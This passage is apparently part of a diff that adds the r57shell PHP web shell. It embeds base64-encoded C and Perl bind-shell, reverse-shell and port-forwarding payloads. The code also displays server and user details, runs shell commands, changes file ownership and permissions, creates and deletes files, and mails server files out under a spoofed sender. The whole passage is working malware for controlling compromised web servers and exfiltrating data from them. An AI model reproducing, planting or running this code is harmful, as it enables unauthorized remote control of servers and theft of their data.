@round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +$f = '<br>'; +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); 